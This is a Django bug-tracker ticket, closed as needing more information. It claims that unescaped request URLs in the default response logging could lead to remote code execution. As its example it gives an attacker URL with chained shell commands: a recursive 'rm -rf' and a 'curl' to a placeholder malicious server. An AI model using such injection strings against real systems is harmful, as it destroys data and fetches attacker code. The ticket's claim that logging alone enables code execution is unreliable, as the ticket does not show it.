id	summary	reporter	owner	description	type	status	component	version	severity	resolution	keywords	cc	stage	has_patch	needs_docs	needs_tests	needs_better_patch	easy	ui_ux
33610	Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution	DJD	nobody	"**Issue**:

When logging enabled in Django the log_response method in log.py of django.utils package logs the given url in the log file as it is without escaping the url which may lead to remote code execution.

**For example:**
An attacker hits the Django project with this url: <hostname>/cgi-bin;cd /var/temp;rm -rf <any folder>; curl <malicious remote server url>

In this case we can see the log file entry with warning (yes because of 404 not found error level is warning) with given url as it is. IMHO we should escape the request response logging so as to minimise the remote code execution possibilities"	Bug	closed	Utilities	4.0	Normal	needsinfo			Unreviewed	0	0	0	0	0	0